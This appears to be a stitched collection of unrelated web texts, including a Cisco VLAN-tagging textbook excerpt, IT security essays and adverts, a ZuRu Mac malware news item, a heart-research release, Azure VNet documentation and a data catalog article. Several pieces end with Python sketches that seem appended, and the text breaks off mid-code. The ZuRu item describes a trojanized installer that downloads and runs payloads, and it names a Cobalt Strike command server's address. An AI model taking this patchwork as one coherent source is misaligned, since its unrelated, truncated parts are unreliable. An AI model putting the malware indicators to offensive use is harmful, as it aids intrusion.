- VLAN ID (VID): A 12-bit VLAN identification number that supports up to 4096 VLAN IDs.

After the switch inserts the Type and tag control information fields, it recalculates the FCS values and inserts the new FCS into the frame.

Native VLANs and 802.1Q Tagging (3.1.2.4)

Native VLANs frequently baffle students. Keep in mind that all trunks have a native VLAN whether you configure it or not. It is best if you control the VLAN ID used as the native VLAN on a trunk. You will learn why in this section.

Tagged Frames on the Native VLAN

Some devices that support trunking add a VLAN tag to native VLAN traffic. Control traffic sent on the native VLAN should not be tagged. If an 802.1Q trunk port receives a tagged frame with a VLAN ID the same as the native VLAN, it drops the frame. Consequently, when configuring a switch port on a Cisco switch, configure devices so that they do not send tagged frames on the native VLAN. Devices from other vendors that support tagged frames on the native VLAN include IP phones, servers, routers, and non-Cisco switches.

Untagged Frames on the Native VLAN

When a Cisco switch trunk port receives untagged frames (which are unusual in a well-designed network), the switch forwards those frames to the native VLAN. If there are no devices associated with the native VLAN (which is not unusual) and there are no other trunk ports, then the frame is dropped. The default native VLAN is VLAN 1 on a Cisco switch. When configuring an 802.1Q trunk port, a default Port VLAN ID (PVID) is assigned the value of the native VLAN ID.
All untagged traffic coming in or out of the 802.1Q port is forwarded based on the PVID value. For example, if VLAN 99 is configured as the native VLAN, the PVID is 99 and all untagged traffic is forwarded to VLAN 99. If the native VLAN has not been reconfigured, the PVID value is set to VLAN 1.

In Figure 3-10, PC1 is connected by a hub to an 802.1Q trunk link. PC1 sends untagged traffic, which the switches associate with the native VLAN configured on the trunk ports and forward accordingly. Tagged traffic on the trunk received by PC1 is dropped. This scenario reflects poor network design for several reasons: it uses a hub, it has a host connected to a trunk link, and it implies that the switches have access ports assigned to the native VLAN. But it illustrates the motivation for the IEEE 802.1Q specification for native VLANs as a means of handling legacy scenarios. A better-designed network without a hub is shown in Figure 3-11.

Figure 3-10 Native VLAN on 802.1Q Trunk

Figure 3-11 Better Native VLAN Design

Voice VLAN Tagging (3.1.2.5)

As shown in Figure 3-12, the F0/18 port on S3 is configured to be in voice mode so that voice frames will be tagged with VLAN 150. Data frames coming through the Cisco IP phone from PC5 are left untagged. Data frames destined for PC5 coming from port F0/18 are tagged with VLAN 20 on the way to the phone. The phone strips the VLAN tag before the data is forwarded to PC5.

Figure 3-12 Voice VLAN Tagging

The Cisco IP phone contains an integrated three-port 10/100 switch. The ports provide dedicated connections to these devices:

- Port 1 connects to the switch or other VoIP device.
- Port 2 is an internal 10/100 interface that carries the IP phone traffic.
- Port 3 (access port) connects to a PC or other device.

When the switch port has been configured with a voice VLAN, the link between the switch and the IP phone acts as a trunk to carry both the tagged voice traffic and untagged data traffic. Communication between the switch and IP phone is facilitated by the Cisco Discovery Protocol (CDP). Look at the sample output.

S1# show interfaces fa0/18 switchport
Name: Fa0/18
Switchport: Enabled
Administrative Mode: static access
Operational Mode: down
Administrative Trunking Encapsulation: dot1q
Negotiation of Trunking: Off
Access Mode VLAN: 20 (student)
Trunking Native Mode VLAN: 1 (default)
Administrative Native VLAN tagging: enabled
Voice VLAN: 150 (voice)
<output omitted>

A discussion of voice Cisco IOS commands is beyond the scope of this course, but the highlighted areas in the sample output show the F0/18 interface configured with a VLAN for data (VLAN 20) and a VLAN for voice (VLAN 150).
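To make the 802.1Q tag fields concrete, here is a short sketch using Python's scapy library. This assumes scapy is installed; the MAC addresses, VLAN ID, and priority value are illustrative, not from the chapter's topology.

from scapy.all import Ether, Dot1Q, IP, ICMP

# Build an Ethernet frame tagged for VLAN 10 with user priority 5.
# Dot1Q inserts the 4-byte 802.1Q tag after the source MAC address.
frame = (
    Ether(src="00:11:22:33:44:55", dst="ff:ff:ff:ff:ff:ff")
    / Dot1Q(vlan=10, prio=5)  # VID = 10 (12 bits), priority = 5 (3 bits)
    / IP(dst="172.17.40.255")
    / ICMP()
)

tag = frame[Dot1Q]
print(f"TPID (EtherType): 0x{frame.type:04x}")  # 0x8100 marks an 802.1Q tag
print(f"User priority:    {tag.prio}")
print(f"VLAN ID (VID):    {tag.vlan}")

Running this prints the TPID value 0x8100, the 3-bit priority, and the 12-bit VID, matching the tag field layout described in the "VLAN Tag Field Details" section above.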
In the past couple of articles we have considered why security is important and what threats are faced, both internal and external. Most, if not all, organisations will be doing something about IT security, so it isn't going to be awfully useful to launch into a treatise on how everybody should be implementing IT security. It is perhaps worth revisiting some of the key elements of 'security done right', however, so we can consider what's getting in the way.

At the heart of all good security practice lies risk management, a discipline shared with such areas as business continuity planning and Health and Safety practice. Done right, risk management considers business risks first and foremost; indeed, it would be fair to say that business risks are the only ones that matter (or to put it another way, if your organisation is unlikely to suffer as a result of a given threat, it's not really going to be worth dealing with). It's important to note of course that risks can be both technical and non-technical.

Of course we have the ongoing dangers of theft or other malicious intent, which need to be protected against through physical, technical and policy means. However, many other risks may exist in the course of normal, day-to-day operations. Consider mobile phones for example, or instant messaging, home working or managing subcontractors. Each of these has a technical aspect: a phone could contain confidential contact lists, for example, or home working could result in un-vetted individuals (i.e. the kids) running unauthorised software. But even in these cases it is important to consider any risks from a business perspective: what would be the impact of losing such a contact list, or of a child playing games? Risk, then, needs to cover all areas, not just the more obvious ones.

From this eminently sensible starting point it is worth bringing up the topic of security standards, in particular ISO 27001 (BS7799). Essentially, what the standard expresses is that to do security right, you first need a security management system that defines how security is to be done in your organisation; then, you need to actually do what it is you said you would do, one element of which is to re-assess the risks and review the measures in place on a regular basis. It is hard to imagine how security best practice could be expressed more pragmatically or practically than the one-two-three of identifying the risks, deciding what to do about them and then doing it.

We do know, however, that many organisations are operating security in a sub-optimal manner. There is even evidence that organisations are actively avoiding working through these things, for fear of what they might find. This is the equivalent of driving down a busy road with a blindfold on, for fear of what one might see. In a more proactive world, in which the business risks are well understood, IT security measures can then go some way towards mitigating them.

We spell this out in such terms because, as we have already mentioned, IT security is about all of people, process and technology. It is here however that we hit the second challenge: that of applying solutions to securing the organisation which take into account threats to the business coming from both outside and inside the organisation. In principle, IT security measures 'should' be considered, designed and implemented in a holistic manner.
From a technical perspective as well, security 'should' be considered across the architecture. The term 'defence in depth' is used to describe how the IT environment can be considered as a series of nested zones, each of which can be secured according to its own needs and with its own boundaries. In practice, however, while many organisations may indeed take their security responsibilities seriously, few achieve a level of security that could be called optimal.

There are many reasons for this, the main one of which is that, bluntly, security is extremely hard to get right. It is a fine aspiration indeed to define and deploy a hardened security environment, but many (if not all) security measures can also have a detrimental effect on the business itself; indeed, too much security can be a business risk. It is perhaps unsurprising, then, that the security measures in place tend towards those which are easier to define and deploy. We can see evidence for this in the chart below, which shows what security products organisations have already implemented, or are planning on implementing.

As can be seen from the chart, there are essentially three 'bands' of security measures. The top band we could refer to as point products: antivirus, VPN and the like, which are already implemented by the majority of organisations. Languishing at the bottom are those security technologies we could consider as 'architectural', for example security event management and behavioural analysis technologies.

So, what's the answer? Are the majority of organisations destined to have willing hearts but weak bodies when it comes to implementing IT security? The answer is probably yes, unless either legislation or accepted corporate behaviour takes a leap forward. Ultimately, however, it is the risks, and how well they are mitigated, that should define whether or not an organisation has got things right. To take a specific example, an organisation may or may not have implemented an intrusion detection system (IDS). Far more important, however, is the knowledge of what information should be considered as confidential and to whom, and whether it is adequately protected against all the risks it may face.

In security, then, risk management offers both a start and end point. It is perhaps ironic that kicking off a risk management exercise, or a re-assessment of the risk register, need not be an onerous task, particularly if the 80:20 rule is applied appropriately. Indeed, not doing this is perhaps the biggest risk of all.
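To illustrate just how lightweight a first pass at a risk register can be, here is a minimal sketch in Python. The risks and scores are entirely made up for illustration; the 80:20 idea is simply to focus first on the few items that float to the top of the list.

# Each entry: (risk description, likelihood 1-5, business impact 1-5).
# The scores below are illustrative placeholders, not real assessments.
RISK_REGISTER = [
    ("Lost phone containing confidential contact lists", 4, 3),
    ("Unauthorised software run on home-working machines", 3, 2),
    ("Theft of customer data by a malicious insider", 2, 5),
    ("Subcontractor mishandles sensitive documents", 3, 4),
]

def rank_risks(register):
    # Score each risk as likelihood x impact and sort highest first.
    scored = [(likelihood * impact, desc) for desc, likelihood, impact in register]
    return sorted(scored, reverse=True)

if __name__ == "__main__":
    for score, desc in rank_risks(RISK_REGISTER):
        print(f"{score:2d}  {desc}")

A spreadsheet does the same job; the point is that the exercise itself, not the tooling, is what takes the blindfold off.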
The anonymity of the dark web is what makes it dangerous. It allows hackers to roam without surveillance, making it a center for illicit activities. Understanding the dark web, data breaches, how to react if your sensitive data is exposed, and how to protect your sensitive information can help save your data from falling into the wrong hands.

What is the Dark Web?

The dark web is an area of the internet that is not available through traditional search engines. It consists of a network of websites, forums, and communication tools that rely on a suite of security tools to anonymize web traffic. It's a huge market for criminal activity, especially for stolen data.

Data is a hot commodity on the dark web, where people buy and sell sensitive information, much of it stolen through network breaches. Your business credentials are most likely on the dark web right now. You should be leveraging dark web scanning to see what information is out there and understand the steps you need to take to protect compromised accounts.

What is a Data Breach?

A data breach is a release of confidential information into an untrusted environment. Usernames, passwords, account numbers, financial records, credit card details, medical records, and more are up for grabs if you do not have the precautions in place to safeguard your data. With today's clever cyberattacks, it's not a matter of if, but when, your organization will be breached. Cybercriminals can use your stolen data to commit identity theft or fraud, or infiltrate your network to go after your business and financial accounts.

Stay Off the Dark Web and Avoid a Data Breach

It is imperative to protect your business's sensitive information from the dark web. By understanding the risks that the dark web poses, you can take the appropriate precautions for your company by implementing and maintaining strong cyber-privacy practices. Such practices include continually monitoring the dark web, so you're notified the moment your information is at risk.

A couple of ways to protect your information from the dark web:

- Implement Multi-Factor Authentication (MFA) for all Internet-accessible services. You should establish strict password and account rules for everyone in your organization.
- Train your employees to be aware of security threats and how to counter them.
- Never share usernames and passwords. If credentials are shared, make sure you change them immediately to avoid a compromise.
- Have a plan in place for security incidents, and make sure that your employees understand their role in mitigating risk.
- Leverage Dark Web Monitoring services. Some security organizations can track the dark web for any information or activity related to your organization.

There are many more ways to protect your information from leaking on the dark web. You need to make sure you and your team are prepared to respond quickly and effectively when a data breach inevitably occurs. Having these practices in place will give you peace of mind that you're taking the necessary steps to protect your organization's data and reputation.

How We Can Help

Our Dark Web Monitoring services provide your organization with protection against data breaches. We conduct a monthly scan of the dark web marketplaces where stolen information is bought and sold. If any of the client's employees' credentials appear in our scan, that means there has been a data leak. We will inform you of the leak through a report that we will generate and deliver after every scan. By being aware of the leak, you can take action to remediate any exposed credentials and know which account(s) to review for any malicious activity.
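As a small complement to monitoring services (not a replacement for them), anyone can check whether a specific password has appeared in publicly known breach corpora using the Have I Been Pwned range API. The sketch below is in Python and assumes the requests package is installed; only the first five characters of the password's SHA-1 hash are sent, so the password itself never leaves your machine.

import hashlib
import requests

def breach_count(password: str) -> int:
    # Return how many times a password appears in known breach dumps.
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    prefix, suffix = digest[:5], digest[5:]
    # k-anonymity: only the 5-character hash prefix goes to the API.
    resp = requests.get(f"https://api.pwnedpasswords.com/range/{prefix}", timeout=10)
    resp.raise_for_status()
    for line in resp.text.splitlines():
        candidate, _, count = line.partition(":")
        if candidate == suffix:
            return int(count)
    return 0

if __name__ == "__main__":
    # Prints a large number; never reuse a password that has leaked.
    print(breach_count("password123"))

Any credential that returns a nonzero count here should be changed immediately and the associated accounts reviewed, exactly as described above.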
We apply our Framework for Successful IT approach to all aspects of our outsourced IT services and consulting. Find out how our team can inform you of any malicious activity and keep your business's data off the dark web.
In China, a new Mac virus called ZuRu has been discovered. Victims get infected through malicious Baidu search engine results. The hackers spread it through the iTerm2 application, a free alternative to the default Mac terminal.

On September 14, a security researcher found ZuRu for the first time. On the same day, another security researcher spotted it and documented it on a Chinese blog. Here are the key points about this malware:

- When searching for iTerm2 on Baidu, a cloned version of the original iTerm2 website appears.
- Users who download the counterfeit installer from the cloned iTerm2 website receive a fully functional but fake copy of the app.
- Because it is signed with an Apple developer certificate, this malicious copy bypasses Gatekeeper and gets installed as usual.
- However, the fake software doesn't have the additional security badge that Apple typically gives to notarized applications.

Along with the malicious iTerm2 application, one more add-on was discovered: a downloader that attempts to connect to an internet server before installing two more pieces of malware. The malicious application seems to be a legitimate version of iTerm2 with a file that loads and runs the dangerous libcrypto[.]2[.]dylib dynamic library to carry out harmful operations.

- The primary objective is to connect to a remote server and download a Python file termed g[.]py and a Mach-O binary termed GoogleUpdate to the /tmp folder, then run both files.
- The GoogleUpdate binary is extensively encrypted and connects with a Cobalt Strike server (47.75.96[.]198:443), a beacon that would give the attacker full backdoor access.
- Furthermore, researchers found other trojanized applications using the identical libcrypto[.]2[.]dylib files: Microsoft Remote Desktop, SecureCRT, and Navicat Premium.

Both Apple and Baidu have taken steps to remove the malicious search results from their platforms. Although attackers will have no difficulty replicating these procedures in fresh attacks, users and security experts should be wary of such dangers.
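Since the ZuRu copies were signed but not notarized, checking an app's notarization status is one practical defence. The sketch below, in Python and macOS-only, simply wraps the built-in codesign and spctl tools; the application path is an example, not a claim about any particular install.

import subprocess

APP = "/Applications/iTerm.app"  # example path; point this at the app to verify

def run(cmd):
    # Run a command and return (exit_code, combined_output).
    proc = subprocess.run(cmd, capture_output=True, text=True)
    return proc.returncode, (proc.stdout + proc.stderr).strip()

# Verify the code signature is intact.
code, out = run(["codesign", "--verify", "--deep", "--strict", APP])
print("signature ok" if code == 0 else f"signature problem:\n{out}")

# Ask Gatekeeper whether the app is accepted; notarized apps typically
# report a 'Notarized Developer ID' source in the assessment output.
code, out = run(["spctl", "--assess", "--type", "execute", "--verbose", APP])
print(out)

A signed-but-unnotarized result is exactly the gap the ZuRu copies slipped through, so a missing notarization source is worth investigating before launching a freshly downloaded app.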
During a heart attack, the supply of oxygen to heart cells is decreased. This reduced oxygen level, called hypoxia, causes the cell's powerhouses, the mitochondria, to fragment, impairing cell function and leading to heart failure. Until now, few details have been known about how this process occurs.

Researchers at the National Institute for Physiological Sciences, Japan, have revealed how filamin A, a key component of the cell skeleton, interacts with the protein Drp1 in hypoxic conditions to facilitate mitochondrial fission. Furthermore, the researchers discovered that the drug cilnidipine can prevent this damaging process. The researchers obtained these findings by studying mouse and rat models of heart attacks and examining the action of filamin A and Drp1 in various settings. They recently published their research in Science Signaling.

"Our results demonstrate that filamin A helps to bind Drp1 to the mitochondria," corresponding author Motohiro Nishida says. "When cell oxygen is low, this binding process activates Drp1 and causes the mitochondria to fragment."

The researchers used a surgical mouse model of heart attack along with various immunochemical methods and an analysis of sub-cellular components for their investigation. Their work determined that hypoxic stress activated the interaction of filamin A with Drp1 and increased Drp1 activity in rat heart cells. The mechanism by which the Drp1 and filamin A interaction is regulated when oxygen is low is currently unknown. However, both knockdown and inhibition of Drp1 limited the mitochondrial fragmentation.

In a final analysis, the researchers showed that the drug cilnidipine helps to prevent the resulting damage to heart cells. This is important because there are currently no clinically applicable drugs that regulate the mitochondrial fission process in heart disease.

"By using cilnidipine, we were able to reduce heart failure in mice after a heart attack," study lead author Akiyuki Nishimura says. "This is because cilnidipine suppresses Drp1-filamin A complex formation, which thereby reduces mitochondrial fission."

Results from the study indicate that the damage to heart cells as a result of the Drp1-filamin A complex does not occur when oxygen levels are normal. These findings are promising for future research aimed at preventing mitochondrial fission in response to hypoxic conditions. Preventing fission could preserve heart function after a heart attack or in the presence of cardiovascular disease.

More information: Akiyuki Nishimura et al, Hypoxia-induced interaction of filamin with Drp1 causes mitochondrial hyperfission-associated myocardial senescence, Science Signaling (2018). DOI: 10.1126/scisignal.aat5185

Journal reference: Science Signaling

Provided by: National Institutes of Natural Sciences
Despite today's rapid evolution in personal technology, there are incredible distinctions between the average user's purchases, practices, and overall knowledge of cyber technology protection. From well-seasoned experts who are fully adept at incorporating the most essential technology to protect their devices, to novice-level beginners who may fully believe that a free online version of antivirus software is sufficient protection for their needs, there remains an incredible disparity in the know-how of proceeding safely in today's digital world and its assortment of ominous threats.

For beginners looking for the most straightforward answer to their questions about needing both a firewall and antivirus: the unequivocal answer is yes. You do need a powerful antivirus program and an equally robust firewall to adequately protect your device. Read on below to learn the easy-to-understand reasons why you need both a firewall and antivirus, how they serve to protect you, and the most common FAQs.

Seriously, don't feel embarrassed if you don't know the difference between a firewall vs. antivirus. You'd be surprised how many millions of people have no idea how antivirus and firewall mechanisms work. Despite all the hipsters you might see at Starbucks typing away confidently on their all-important work, you really would be shocked at the answers you might receive if you were to pose the question of what a firewall vs. antivirus is. Antivirus programs and firewalls work together in tandem to provide maximum protection of your device from any incoming, intruding malicious cyber threats.

What is Antivirus?

Antivirus software is the single most used cybersecurity tool to protect PCs, Macs, and an assortment of devices, and is heavily invested in by international corporations, institutions, and businesses of all kinds to protect from any kind of incoming threat. In essence, it is a business's armor against attack. Antivirus software operates by scanning files and entire systems, detecting instances of harm, and removing the discovered threats to keep data, devices, and businesses infection free.

The depth and breadth of antivirus software vary widely. From versions that are free of cost to business-oriented versions that are pricey enough to raise an eyebrow, there are antivirus programs available on the market for everyone from at-home users to the largest corporations in the world who are heavily invested in the business of cybersecurity. Clearly, the more expensive antivirus programs will come with a bevy of extra perks and benefits, many of which larger businesses appreciate as they attempt to build a comprehensive suite of protective tools that leaves no opening for any type of digital threat.

What is a firewall?

A firewall acts as "armor" between your device's network and the world wide web. It effectively monitors any incoming and outgoing traffic from your system and prevents suspicious packets from entering or leaving the network. Think of your firewall as your bouncer. When troublesome drunken clients try to come into your establishment, your bouncer contends with them easily, never letting them in the front door to cause you any problems.

Taking a glance at the key differences between firewalls vs. antiviruses will likely help you come to a comprehensive understanding of the differences and how they ultimately work together in a protective manner.
A firewall is akin to armor that prevents infected and malicious software and packets from entering your system. Antivirus provides the protection of your PC, device, or network, and scans, detects, and removes infected files.

Every single day, PCs, Macs, other devices, and networks are infected with viruses, malicious data, and much more. Cyber data protection has grown immensely with each passing year. However, the level of sophistication found in hacking attempts has also grown, with malicious threats teeming with never-before-seen complexities.

Maintaining a sufficient level of security for your device isn't something that you should fret about. Many articles will make it sound a lot more complex than it needs to be. Yes, you need to have a multi-layered level of security, but those layers are simple. In a highly condensed nutshell: if you are a beginner or novice user, make sure you have your firewall in place and in the "on" mode, and install an antivirus program, perhaps considering a subscription plan with a few extra perks and benefits.

The cyber world in its current incarnation can prove to be vastly confusing, especially to beginners, as the advances in tech surge, rendering many seemingly "new" devices obsolete in the blink of an eye. In today's technological times, data security is of paramount importance; it safeguards our identities, financial details, and critical business information. Through the tandem protection of a firewall and powerful antivirus software, users can confidently monitor their network traffic, prevent the intrusion of malicious data into their device, and not have to worry about the theft of sensitive personal details.
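To picture the "bouncer" role in code, here is a deliberately tiny Python sketch of rule-based packet filtering. The rules and packets are made up for illustration; real firewalls run in the kernel or on dedicated hardware with far richer state tracking.

# Each rule: (direction, remote_ip_prefix, port, action). First match wins;
# an empty prefix or a None port matches anything.
RULES = [
    ("inbound",  "203.0.113.", 22,   "deny"),   # block SSH from a bad range
    ("inbound",  "",           443,  "allow"),  # allow HTTPS from anywhere
    ("outbound", "",           None, "allow"),  # allow all outbound traffic
]

DEFAULT_ACTION = "deny"  # anything unmatched is dropped at the door

def filter_packet(direction, remote_ip, port):
    # Return 'allow' or 'deny' for a packet, like a bouncer checking a list.
    for rule_dir, ip_prefix, rule_port, action in RULES:
        if rule_dir != direction:
            continue
        if not remote_ip.startswith(ip_prefix):
            continue
        if rule_port is not None and rule_port != port:
            continue
        return action
    return DEFAULT_ACTION

print(filter_packet("inbound", "203.0.113.9", 22))    # deny
print(filter_packet("inbound", "198.51.100.7", 443))  # allow
print(filter_packet("inbound", "198.51.100.7", 8080)) # deny (default)

The default-deny stance at the end is the key design choice: anything the rules do not explicitly welcome stays outside.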
Virtual Network (VNet)

What is an Azure Virtual Network (VNet)?

Azure VNet Operations

Azure Virtual Network allows many types of Azure resources, such as Azure virtual machines (VMs), to communicate securely with each other, with the Internet, and with on-premises networks. The scope of a virtual network is a single region; however, several virtual networks in different regions can be connected together by virtual network peering.

Azure Virtual Network provides the following important functionalities:

Isolation and segmentation

You can deploy multiple virtual networks within each subscription and Azure region. Each virtual network is isolated from the other virtual networks.

- Specify a private IP address space using public and private (RFC 1918) address ranges. Azure assigns resources in a virtual network a private IP address from the address space that you assign.
- Segment the virtual network into one or more subnets and assign a portion of the virtual network's address space to each subnet.
- Use the name resolution provided by Azure, or specify your own DNS server to be used by resources connected to a virtual network.

Filtering

You can filter network traffic between subnets using one or both of the following options:

- Security groups: Network security groups and application security groups can contain multiple inbound and outbound security rules that let you filter traffic to and from resources by source and destination IP address, port, and protocol. For more information, see network security groups and application security groups.
- Network virtual appliance: A network virtual appliance is a virtual machine that performs a network function, such as a firewall, WAN optimization, or another network function. To see a list of network virtual appliances that can be deployed in a virtual network, see Azure Marketplace.

Routing

By default, Azure routes traffic between subnets, connected virtual networks, on-premises networks, and the Internet. You can implement one or both of the following options to override the default routes Azure creates:

- Route tables: You can create custom route tables with routes that control where traffic is routed for each subnet. More information on route tables.
- Border Gateway Protocol (BGP) routes: If you connect your virtual network to your on-premises network through an Azure VPN Gateway or ExpressRoute connection, you can propagate your on-premises BGP routes to your virtual networks. More information about the use of BGP with Azure VPN Gateway and ExpressRoute.
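To make the address-space segmentation described above concrete, here is a small Python sketch using only the standard library's ipaddress module. The 10.0.0.0/16 space and subnet names are illustrative, and this is addressing arithmetic only, not a call to any Azure API.

import ipaddress

# An RFC 1918 private address space assigned to the virtual network.
vnet = ipaddress.ip_network("10.0.0.0/16")

# Carve the VNet's space into /24 subnets and name the first few.
subnet_names = ["web", "app", "db"]
subnets = dict(zip(subnet_names, vnet.subnets(new_prefix=24)))

for name, net in subnets.items():
    # Note: Azure reserves a handful of addresses in each subnet, so the
    # raw count shown here slightly overstates what is usable.
    print(f"{name:>3}: {net} ({net.num_addresses} addresses)")

Each named subnet is a disjoint slice of the VNet's space, which is exactly the property that lets security groups and route tables treat them as separate segments.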
You've probably heard these words in the news relating to job losses or future jobs. What all these words have in common is that they are derived from coding. Coding is the backbone of all the technology that powers the devices we use daily: phones, computers, and more. Most of the mundane, repetitive processes performed by human labor today will eventually be handled by computers powered by code; they can work longer, faster, and more efficiently than humans.

For example, one of the most common jobs in many U.S. states is truck driving. In the next 25 years alone, automation powered by code is projected to replace nearly 300,000 truckers. Self-driving trucks will be able to drive longer, more safely, and more cost-efficiently than human drivers. From drones and self-driving technology to robotics, the future of the world is powered by code.

Developers and engineers with coding knowledge are well compensated and in short supply in today's workforce. Software developers have an average salary of $100K, with above-average work-life balance and average stress levels. Additionally, IT and programming roles at companies are expected to grow by 30% by the year 2026. Coding provides a career with high future growth, great work-life balance, and a comfortable living.

The real question is how you can learn to code and equip yourself with the skills necessary to be a part of the future workforce. Now that you've seen how code empowers the apps, platforms, and devices that make up most of our world, what are the steps you need to take to become a professional developer and use code to make a significant impact in the world?

Learning to code can be accelerated exponentially by going through a coding bootcamp. A coding bootcamp is an intense, fast-paced environment where you can learn to code under the supervision of developers who guide you day to day. After the completion of a bootcamp, you will have an employable skill set and can work for companies that are in need of coding expertise. At a Max bootcamp, students have a 93% job placement rate, and IT coaches go through every step of finding employment, including resume writing and interview skills. Sign up here for a free 10-minute consultation with a career adviser or a placement coach!
Data encryption is one of the most important elements in any cybersecurity strategy, since it keeps data safe even if it lands in the wrong hands. You can encrypt data as it's stored on your hard drive, online storage or any other system, or when it's being transmitted across the web.

The main purpose of encryption is to keep digital data safe, and modern data encryption algorithms are practically impossible to break using current technology. As such, encryption plays a critical role in the integrity and authentication of confidential data, such as payment details or any personally identifiable information. You'll encounter encryption whenever shopping online or accessing any website or web application that requires you to enter a password, as indicated by the padlock icon next to the address bar in your browser.

Mankind has been encrypting messages for thousands of years, with the most basic methods involving a simple cipher. Of course, these methods are very basic and insecure, and any modern computer can crack them in a matter of minutes. As computers get faster, and thus more capable of cracking dated encryption methods, it becomes necessary to use more complex algorithms that cannot, to all intents and purposes, be cracked.

Modern encryption technology relies on ever larger key sizes to conceal encrypted data. The larger the key size, the longer it would take for a brute-force attack to successfully decrypt the scrambled plaintext. Most modern encryption algorithms use a 128-bit key, which would require a brute-force attack to try 2^128, or roughly 340 undecillion (a 39-digit number), possible combinations. In other words, it's practically impossible to crack using today's computers, since it would take trillions of years. Some algorithms use 192- or 256-bit keys, which will likely become the new industry standard as technology moves ahead.

An essential step to take in formulating any cybersecurity strategy is to define which data is sensitive and determine precisely where it is being stored and transmitted and who has access to it. Absolutely all potentially sensitive data should be encrypted, regardless of where you keep it.

It's also important to encrypt internet traffic, particularly if you have a mobile workforce whereby employees regularly access corporate apps and data over connections you have no control over, such as public WiFi hotspots. To make your data unusable to eavesdroppers, you should always use a virtual private network (VPN), which encrypts your traffic by routing it through a trusted third party.

Other data you should encrypt includes data kept on cloud storage platforms or stored and transmitted over email. Most service providers provide automatic encryption for data storage and transit. Nonetheless, if you're using a public cloud service like Dropbox or OneDrive, you'll probably want to add an additional layer of encryption that you have complete control over.

Dyrand Systems provides complete IT services to businesses seeking an affordable and secure way to build a cloud-based computing infrastructure where your data is always safe from prying eyes. Call us today to find out what we can do for you.
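Returning to the point about adding your own layer of encryption on top of public cloud storage, here is a minimal sketch using Python's third-party cryptography package (assumed to be installed via pip). Its Fernet recipe is built on 128-bit AES, the key size discussed above; the sample plaintext is just a placeholder.

from cryptography.fernet import Fernet

# Generate a key once and store it somewhere safe (a password manager,
# a hardware token, etc.); whoever holds the key can decrypt the data.
key = Fernet.generate_key()
fernet = Fernet(key)

secret = b"Q3 payroll figures - internal only"
token = fernet.encrypt(secret)  # the token is safe to upload to cloud storage
print(token[:40], b"...")

# Only a holder of the key can reverse the operation.
assert fernet.decrypt(token) == secret

Because you generate and keep the key yourself, the cloud provider only ever sees ciphertext, which is precisely the "layer you control" described above.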
Many companies have responded to the difficulties and uncertainties of COVID-19 by asking their employees to work remotely. The shift to work-from-home is a necessary and practical step to combat the spread of the virus. But even if many industries were already becoming more remote-worker friendly, the abruptness of this crisis has created new challenges for those who depend on data and information to fulfill their responsibilities. Business decision makers at all levels need current and reliable information to navigate the turbulence of economic uncertainties, rapidly changing social conditions, and strategic volatility. As the importance of rapid and real-time data analysis increases, the challenges and complexities of analytics are also expanding. For many organizations, the collaborative nature of data analysis is inhibited when decision makers, data subject matter experts, data engineers, and data analysts are not able to meet face-to-face.

The Challenges of Remote Data Analytics

Data analysis and data science are complex processes in the best of conditions. The work begins with understanding the requirements, knowing what information is needed, not as a project phase but as an ongoing process of exploration and discovery that demands collaboration between decision makers (information consumers) and data analysts (information producers). Communication and continuous feedback are essential but difficult to achieve when everyone involved works remotely.

Getting from requirements to analysis-ready data is a multi-step and iterative process that involves finding data for analysis, understanding and evaluating the data, and preparing data for analysis. Data analysts often rely on tribal knowledge to help them find data. The marginal effectiveness of tribal knowledge networks is certain to suffer when those with knowledge all work in different remote locations. Next, the analyst works intensely to explore, understand, cleanse, blend, and prepare data for analysis; by some estimates this accounts for 80% of analytics work, time that is not spent analyzing data and a barrier to rapid and agile analytics. Sharing of data, data knowledge, and data preparation processes helps to accelerate data preparation work. But this kind of sharing typically depends on tribal knowledge networks.

With prepared data, the core data analysis work occurs: choosing analysis techniques and statistical methods, designing data visualizations, and interpreting the data. Data analysis at its best is an iterative process where each cycle of analysis finds meaning, generates ideas, and sparks insights that lead to deeper and richer analysis. But this kind of analysis is as much a human and cultural endeavor as it is a technical process. Collaboration among multiple people with diverse perspectives and thinking styles is the key to ideation and discovery of insights. It is a social process that can be greatly hindered by the social barriers that working remotely creates.

Finally, it is time to put the analysis to work: to devise strategies and tactics, to make decisions, and to take actions based on discoveries and insights from data. At this point the results of analysis are shared, and socialization is critical. The real power of data analytics is in the ways that it drives communications, conversations, and collective understanding. Bob Duniway, Assistant Vice President for University Planning at Seattle University, once said to me: "Business Intelligence doesn't happen in computers.
It happens between the ears and in the conversations between people." That's a powerful statement that emphasizes the futility of analytics without socialization. Clearly the social barriers of working remotely are as significant for information consumers as for information producers.

Data-informed decisions and actions are the goals of data analysis, but they are not the end of the story. With each insight, and with every decision and action, come new questions and new analysis needs. Decision and action are the end of one analytics cycle and the beginning of another. Cycle time accelerates in times of turbulence and uncertainty.

The Role of the Data Catalog

Analytics speed and agility are essential for businesses to navigate successfully through the coming months. Collaboration, communication, knowledge sharing, and socialization are the keys to enabling agile analytics. Across the entire data analysis cycle, data catalog capabilities fill important roles in analytics agility. (See figure 1.) The right data catalog used in the right ways will make a real difference in your organization's capabilities for listening to the data and making data-informed decisions, critical capabilities for navigating the societal and economic uncertainties of the future. Give special attention to these guidelines to maximize the impact of data cataloging:

- The catalog must support collaboration and crowdsourcing as well as communication, comments and reviews, and knowledge sharing about data.
- The data catalog should be widely adopted and valued by data stakeholders.
- The data catalog should be supported with formal data curation practices.
- The data catalog should provide features and functions to catalog more than datasets. It should support cataloging and sharing of data preparation processes, reports, and analysis results.
- The data catalog should support critical data governance needs such as identification and tagging of privacy-sensitive data.

And finally, two big "must have" items; these are more than guidelines. They are essentials for the data catalog as core business management technology.

- The data catalog must recognize and integrate people as core elements of data ecosystems.
- The data catalog must be an enterprise data catalog, aware of all shared data regardless of locations and technologies.

The current COVID-19 situation won't last forever. But it will have long-term economic effects, and it may have lasting impact on the way that we work. Data and analytics become more important than ever as businesses make critical decisions to adapt and adjust to continuously changing conditions. It is likely that work-from-home, when no longer a mandate, will become a preferred option for many employers and employees. Serving data and analytics needs in a world of remote workers brings many new challenges. The data catalog has an important role in meeting those challenges.
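As a purely illustrative sketch of what "cataloging more than datasets" can look like, here is a toy catalog entry in Python. The schema, names, and tags are invented for this article and do not reflect any vendor's actual model; the point is simply that ownership, tags, and a privacy flag make assets findable without tribal knowledge.

from dataclasses import dataclass, field

@dataclass
class CatalogEntry:
    name: str
    kind: str                 # "dataset", "report", "prep-process", ...
    owner: str
    tags: set[str] = field(default_factory=set)
    privacy_sensitive: bool = False  # supports governance tagging

CATALOG = [
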